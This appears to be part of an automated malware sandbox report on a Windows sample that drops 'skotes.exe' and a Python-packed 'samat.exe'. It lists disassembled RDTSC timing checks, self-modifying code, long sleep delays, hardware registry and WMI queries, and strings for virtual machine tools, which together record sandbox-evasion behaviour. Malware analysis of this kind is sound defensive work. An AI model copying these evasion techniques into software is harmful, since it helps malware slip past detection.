Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01C8 second address: 52B01CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01CE second address: 52B01D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01D2 second address: 52B0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov edx, esi 0x0000000c mov dx, si 0x0000000f popad 0x00000010 mov dword ptr [esp], esi 0x00000013 pushad 0x00000014 movzx ecx, di 0x00000017 jmp 00007F848150386Dh 0x0000001c popad 0x0000001d mov esi, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F848150386Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0209 second address: 52B026A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8480743937h 0x00000009 add eax, 66CC223Eh 0x0000000f jmp 00007F8480743939h 0x00000014 popfd 0x00000015 mov esi, 36AD4987h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, edi 0x0000001e jmp 00007F848074392Ah 0x00000023 push eax 0x00000024 jmp 00007F848074392Bh 0x00000029 xchg eax, edi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B026A second address: 52B026E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B026E second address: 52B0274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0274 second address: 52B02C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F8481503874h 0x00000018 popad 0x00000019 je 00007F84F3171BDFh 0x0000001f jmp 00007F8481503870h 0x00000024 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F848150386Ah 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B02C7 second address: 52B02CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B02CD second address: 52B0329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F84F3171BB2h 0x0000000f pushad 0x00000010 pushad 0x00000011 mov cx, C6A3h 0x00000015 mov edx, eax 0x00000017 popad 0x00000018 call 00007F8481503874h 0x0000001d pushad 0x0000001e popad 0x0000001f pop esi 0x00000020 popad 0x00000021 mov edx, dword ptr [esi+44h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F8481503878h 0x0000002c mov ax, E0E1h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0329 second address: 52B034D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B034D second address: 52B0351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0351 second address: 52B0357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0357 second address: 52B03BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8481503878h 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test edx, 61000000h 0x00000015 jmp 00007F848150386Ah 0x0000001a jne 00007F84F3171B65h 0x00000020 jmp 00007F8481503870h 0x00000025 test byte ptr [esi+48h], 00000001h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8481503877h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0831 second address: 52A0880 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, A029h 0x00000011 pushfd 0x00000012 jmp 00007F8480743936h 0x00000017 sub ecx, 199D79F8h 0x0000001d jmp 00007F848074392Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0880 second address: 52A0886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0886 second address: 52A088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A088A second address: 52A08D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F848150386Bh 0x00000015 add ax, EA6Eh 0x0000001a jmp 00007F8481503879h 0x0000001f popfd 0x00000020 mov eax, 2D75BFF7h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A08D0 second address: 52A0911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov ecx, 2E2E7239h 0x00000012 push ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 jmp 00007F8480743932h 0x0000001a popad 0x0000001b and esp, FFFFFFF8h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F848074392Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0911 second address: 52A0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0915 second address: 52A091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A091B second address: 52A0921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0921 second address: 52A0948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743938h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, dl 0x00000011 mov edi, ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0948 second address: 52A096A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F848150386Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A096A second address: 52A0986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F848074392Fh 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 72E96C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8E281D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 966F64 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 80E96C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9C281D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: A46F64 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053203B3 rdtsc 0_2_053203B3
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 428
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1412
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 517
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2460
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_overlapped.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des3.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_strxor.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_asyncio.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve448.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cfb.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aes.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA224.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ocb.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_poly1305.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_eksblowfish.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_arc2.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ecb.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2b.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_RIPEMD160.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ctr.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD2.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Protocol\_scrypt.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_keccak.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\python313.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\select.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA1.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Math\_modexp.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_chacha20.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_portable.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA512.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ofb.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_sqlite3.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_multiprocessing.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed448.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cbc.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ec_ws.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2s.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cast.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA256.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed25519.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve25519.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_pkcs1_decode.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aesni.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD5.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA384.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD4.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_Salsa20.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\win32\win32crypt.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_clmul.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_cffi_backend.cp313-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_blowfish.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_wmi.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_cpuid_c.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe API coverage: 1.9 %
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5264 Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5352 Thread sleep count: 428 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5352 Thread sleep time: -856428s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5084 Thread sleep count: 304 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5084 Thread sleep time: -9120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1732 Thread sleep count: 1412 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1732 Thread sleep time: -2825412s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5736 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5476 Thread sleep count: 517 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5476 Thread sleep time: -1034517s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6528 Thread sleep count: 2460 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6528 Thread sleep time: -4922460s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3636 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7436 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7204 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C9280 FindFirstFileExW,FindClose, 7_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 7_2_00007FF7E12C83C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C9280 FindFirstFileExW,FindClose, 8_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 8_2_00007FF7E12C83C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 8_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF1230 GetSystemInfo, 8_2_00007FF8B7FF1230
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: skotes.exe, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray.exe
Source: samat.exe, 00000007.00000003.2990422238.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmusrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmwaretray.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dqemu-ga.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dVMware SVGA 3D
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvboxtray.exe
